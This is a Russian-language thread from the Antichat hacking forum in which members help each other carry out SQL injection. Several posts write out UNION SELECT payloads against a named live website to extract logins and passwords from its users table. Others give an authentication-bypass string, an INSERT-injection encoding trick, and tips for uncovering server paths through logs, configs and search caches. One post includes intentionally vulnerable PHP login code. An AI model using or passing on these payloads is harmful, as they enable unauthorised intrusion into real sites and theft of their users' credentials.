ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.02.2010, 15:01
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Есть иньекция.
Таблицы login and pass я вытащил успешно.
Таблица users
Но при попытке вытащить данные логина и пароля - белый экран или ошибка.
Как обходится этот баг?
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+users-- - белый экран
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+Users-- - ошибка
 
Ответить с цитированием

  #2  
Старый 25.02.2010, 15:11
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Код:
http://brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,count(*),5,6,7+from+users--
0 записей

Последний раз редактировалось Pashkela; 25.02.2010 в 15:25..
 
Ответить с цитированием

  #3  
Старый 25.02.2010, 15:30
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
С нами: 9288289

Репутация: 40
По умолчанию

Не хочет в базу писать русские символы.
Это инъекция, так что запрос только такой.
INSERT _cat SET category='0' а дальше можно дописывать
Код:
INSERT _cat SET category='0', 2_category='0', name_cat='Русский', en_name_cat='sd', description='', sort_index='0'
есть какие то варианты туда их запихнуть всетаки)?

Проблему решил!

name_cat=CHAR(0xF6F3E0F6F3E0 USING cp1251)

Последний раз редактировалось FAQ666; 25.02.2010 в 16:25..
 
Ответить с цитированием

  #4  
Старый 25.02.2010, 19:12
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами: 8854580

Репутация: 34
По умолчанию

как узнать путь до директории сайта на сервере, пути раскрыть короче ?! через текст ошибки в пхп скрипте не получилось...
 
Ответить с цитированием

  #5  
Старый 25.02.2010, 19:25
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами: 9594385

Репутация: 386
По умолчанию

Цитата:
как узнать путь до директории сайта на сервере, пути раскрыть короче ?! через текст ошибки в пхп скрипте не получилось...
1)найти раскрытие в скрипте
2)попробывать найти логи, конфиги а в них пути (список путей к ним здесь )
3)попробывать найти в кеше поисковиков/веб архиве
4)побегать с бубном и угадать
 
Ответить с цитированием

  #6  
Старый 26.02.2010, 00:01
scorpic393
Banned
Регистрация: 05.02.2010
Сообщений: 70
С нами: 8559689

Репутация: 5
По умолчанию

Помогите плиз! Бред какойто... тренируюсь в скулях. Вот мой код

PHP код:
if(isset($_POST['login']) && isset($_POST['password']))
{
    
$login=$_POST['login'];
    
$password=md5($_POST['password']);
    
$query="SELECT * FROM users WHERE login='$login' AND password='$password' LIMIT 1";
    echo 
$query;
    
$response=mysql_query($query);
    
$result=mysql_fetch_array($response);
    if(
$login==$result['login'] && $password==$result['password'])
        
$_SESSION['id']=$result['id'];
}
if(!isset(
$_SESSION['id']))
{
    echo 
"
    <form method=post>
    <table>
    <tr><td>Логин:</td><td><input type=text name=login></td></tr>
    <tr><td>Пароль:</td><td><input type=text name=password></td></tr>
    <tr><td><input type=submit name=submit value=Вход></td></tr>
    </table>"
;
    exit;

таблица users:

id | login | password
1 | admin | md5passs


я подставляю в форму логин: admin'; --
пароль: bla bla bla
сделал в сурипте отладочный вывод заппроса

PHP код:
SELECT FROM users WHERE login='admin'; --' AND password='698d51a19d8a121ce581499d7b701668' LIMIT 1 
но нифига не заходит, пишет Warning: mysql_fetch_array(): supplied argument is not a valid MySQL........
 
Ответить с цитированием

  #7  
Старый 26.02.2010, 00:11
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

После каждого запроса дописывай
Код:
or die(mysql_error())
... И будешь видеть суть ошибки.
 
Ответить с цитированием

  #8  
Старый 26.02.2010, 00:34
scorpic393
Banned
Регистрация: 05.02.2010
Сообщений: 70
С нами: 8559689

Репутация: 5
По умолчанию

Цитата:
Сообщение от mailbrush  
После каждого запроса дописывай
Код:
or die(mysql_error())
... И будешь видеть суть ошибки.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '36eba1e1e343279857ea7f69a597324e' LIMIT 1' at line 1

помогите ктонить знающий в чём трабла?

UPD: зашло двое мемберов и хер кто ответил...

Последний раз редактировалось scorpic393; 26.02.2010 в 00:49..
 
Ответить с цитированием

  #9  
Старый 26.02.2010, 05:13
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

admin' or 'admin'='admin' --
(После -- пробел обязательно =\ )


Цитата:
Сообщение от Ershik  
Есть иньекция.
Таблицы login and pass я вытащил успешно.
Таблица users
Но при попытке вытащить данные логина и пароля - белый экран или ошибка.
Как обходится этот баг?
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+users-- - белый экран
_brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,pass,5,6,7+from+Users-- - ошибка
Цитата:
http://brandmauer-vlz.ru/?b=ph&id=-1+union+select+1,2,3,4,(SELECT+concat_ws(0x3a,logi n,pass)+FROM+users),6,7+--+
Видимо она вообще пустая =\

Последний раз редактировалось Ctacok; 26.02.2010 в 05:28..
 
Ответить с цитированием

  #10  
Старый 26.02.2010, 10:39
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию

Есть какая-нибудь функция для определения текущей базы без скобок???
Всё кроме неё нашёл, мб кому-то и пригодится

user(), current_user(), system_user(), session_user() = current_user
version() = @@version
ось я только как без скобок знаю @@version_compile_os
А вот database() =???
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.